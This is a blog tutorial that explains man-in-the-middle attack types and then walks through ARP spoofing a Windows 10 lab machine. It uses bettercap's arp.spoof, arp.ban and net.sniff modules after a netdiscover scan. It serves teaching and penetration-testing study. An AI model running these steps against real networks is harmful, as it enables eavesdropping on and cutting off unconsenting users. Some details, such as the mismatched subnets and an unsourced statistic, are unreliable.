introduction and illustration of the man-in-the-middle attack

Posted by Dipnarayan Sen April 10, 2023

introduction and illustration of the man-in-the-middle attack

Have you ever wondered how the hacker in those spy movies is able to get specific information from a certain person without even being detected?

Well, there are various no. of ways by which they do so. Today we will be learning a particular type of attack which will be enabling us to do the same by using a brilliant technique called “MAN IN THE MIDDLE(MITM)”

What is Man In The Middle (MITM) attack?

Although "man-in-the-middle" is frequently associated with attacks, it is a very simple and effective way to gather info. It is a general word to describe any device that stands between your computer and the target.

That said, you can imagine what becomes possible when an attacker can place themselves between your data and a destination: stolen personal information, passwords/credentials, financial information, general browsing history, and more. All of these types of information fall under a category that most would refer to as "sensitive information".

How a MITM attack takes place

When you are using really outdated software or are connected to an unsafe network, MITM assaults frequently happen. An analogy could be useful before we delve deeper into how an MITM attack functions. Think about if John had called Jane. Nothing appears to be wrong as you start your call by informing Jane about your day. Sadly, the attacker who positioned himself/herself between your phone and Jane's phone has been listening in on your ostensibly "safe" call the entire time. This means that everything about "your day" is now known to the attacker. This is, quite literally, the definition of a "man-in-the-middle" attack.

An MITM begins with "inspection" in more formal terms. In order to prepare their next action, an attacker will initially monitor outbound traffic (checking for insecure traffic, etc.). Additional routes include packet injection and session hijacking, which involves the theft of cookies.

Finding a means to "slot" themselves in for an attack will eventually be their next move. If they can present themselves as an "invisible" entity between you and a destination server, they will do it. This includes utilizing a stolen SSL certificate (for MITM'ing secure connections) or exploiting weaknesses in earlier SSL versions.

When this happens, the attacker effectively has complete control over the data being intercepted. They can alter data in real time to trick a target server into sending money to the attacker and collect additional personal data (such as your date of birth, SIN/SSN, and more).

What Makes Man-in-the-Middle Attacks So Dangerous?

Because MITM attacks can enter a network undetected, harvest sensitive data, and exit before anybody becomes suspicious, they can wreak a great deal of harm. If someone is not paying attention, their device may connect to the bogus SSID and their passwords will be taken because devices link to the strongest signal. Although MITM attacks can be identified and halted, the attacker can still escape with the data that has already been taken.

Companies that experience MITM attacks may lose their consumers' trust and be forced to spend time and money resolving the issue. The IT division is now in trouble for allowing this hack to happen. Cyberattack victims have a 60% probability of going out of business in as little as 6 months.

Types of Man-in-the-Middle Attacks

Man-in-the-middle (MITM) attacks can be divided into two categories: "interception" and "decryption" since they all include intercepting data packets and encrypting that data in order to access the network and all the private data.

ARP Spoofing

Protocol for Address Resolution, A valid IP address is linked to an attacker's MAC address through spoofing. When the hacker transmits a false ARP message over the LAN, a connection is made. The data that was meant to be sent to the legitimate IP address can then begin to be funneled by the hacker.

DNS Spoofing

In domain name server spoofing, a hacker creates a false website that mimics a real one and directs visitors there. Unaware users will visit the false page and enter their login information, which will immediately be sent to the hacker.

IP Spoofing

Network computers and devices frequently communicate by sending IP data packets, which contain vital data such the source address. The trick is to alter the source address such that a computer will mistakenly connect to the hacker's software as though it were an actual IP address.

HTTPS Spoofing

While the HTTPS protocol can prevent spoofing, hackers have developed an attack style in which they register domain names that mimic well-known domain sites and transmit links to their targets, taking advantage of a flaw in the address bar. After connecting to the malicious website, the victim will be exposed to credential theft.

SSL Stripping

One effective security mechanism that has been successful in thwarting MITM attacks is the HTTPS protocol. This gave rise to a brand-new attack technique that entails hacking into an online transaction, intercepting a secure HTTPS transmission from a server or web browser, downgrading HTTPS to HTTP, and connecting to the other side. The hacker now completely controls the connection and harvests the data.

IN THIS ARTICLE, WE WILL BE TALKING ABOUT ARP SPOOFING

LETS GET STARTED

Getting information is one of the most crucial steps. When it comes to penetration testing or hacking. When you consider it, A system is incredibly difficult to access, if you lack sufficient knowledge regarding it. For instance, If you're linked to a network, let's say one of our target is anything linked to this network. Now that you have that target, hack into it. You must first identify every connected client. the network, the Mac address of their Internet protocol address. and then after that, might try to learn more or launch some attacks in an effort to access your goal. Now, Many programs exist that can perform this task for you.

For checking your own network configuration run the following command in your linux terminator

Ifconfig

This will produce the following output which will give the following details

The network interface : eth0

IP address : 192.168.0.110

MAC Address : 08:00:27:89:f7:4f

NOTE that these are the details of your own network and your own device

To get the details of all other devices that are connected to the network run the following command

Netdiscover -r IP address of first 3 parts.1/24

So instead of manually typing all of these IPS, we can just type over 24 and net discover will automatically know that we are trying to search for all of the IPS that start at 192.168.74.1and end at 192.168.74.1/24 So this is a way of specifying an IP range for the whole subnet.

netdiscover -r 192.168.74.1/24

this will generate the following output :

This is giving us all the details of those clients which are connected to the same network With their corresponding IP addresses and MAC addresses. There are other tools also available which enables us to perform such searches in the network, such as Zenmap. Let us see the pictorial view of the network that we are connected to.

Here the yellow dot is representing the network gateway or in other words the router of the network which is basically holding the network together. The green dots are representing the connected devices on the network. The middle most green dot is our connected devices on the network. Let us look into our target machine with IP ending with 134 on which we will be performing the attack.

As you can see that our Windows 10 computer ID having ip address as 192.168.74.134 and which is connected to a router with ip address as 192.168.74.2. Also notice the MAC address of the router is given as 00:50:56:f5:ad:db. We will be performing our attack on this Windows 10 machine. Now we will be going to our kali machine and start bettercap for which we can use the command

Bettercap -iface [interface]

In the interface section we will pass eth0 as it is our interface which we got using ifconfig command

If you don’t know how to use better cap you can always try typing help which will show all the modules and functions that bettercap provides you.

For example if you want to know that what net.probe module does you can always use the help command followed by the module name

So basically it keeps sending UDP packets to discover devices on the same network. And we can do net.probe on, to turn on the module and net.probe off,to turn it off. You can also see all the options that you can modify for this module.

So this is just another way of discovering connected clients quickly using better cap. And we can see you windows device on the list wit ip 192.168.74.134 Now, coming to the man in the middle attack which we will be doing using the arp spoof model in better cap. To know how to use the particular model we will again be using the help command for arp spoofing

Here we are provided with a lot of options such as and modes for arp spoofing and with their details how they work. we can do arp.spoof on to turn this module on. We can do arp.ban on and this will literally just cut the connection of the target. This is very simple. You can try it on your own time. You can do arp.spoof off to turn it off and arp.ban off to turn the ban off.

We can set the parameters using the command set [parameter name] [parameter value] we need to set the arp.spoof.fullduplex to be true as it will spoof both the device the router as well as the target machine we also need to set the arp.spoof.targets to set the ip address of the target which will tell better cap to target this particular device. And lastly we need to turn on the arp spoof module using arp.spoof on

These commands will do the arp spoofing to the target machine and tell that machine that this current machine is the current router, which means all the requests that are being sent to the router will pass through this kali machine first and the request will be forwarded to the router where the router will think that the request is coming from the original device.

We can now check the target matching using arp -a command and see the difference.

Notice that the mac address of the router has been changed and the Windows computer’s all the request to ip address 192.168.74.2 will now be listened at the updated mac address. Likewise, we can also capture the data flow between the router and the target machine using the better cap command net.sniff module and turn it on

This will sniff all the network activity In the windows. For example, if we search of google.com it will show that get request is made to google.com

Hence we have successfully performed an arp spoofing attack on a windows 10 computer.

Comments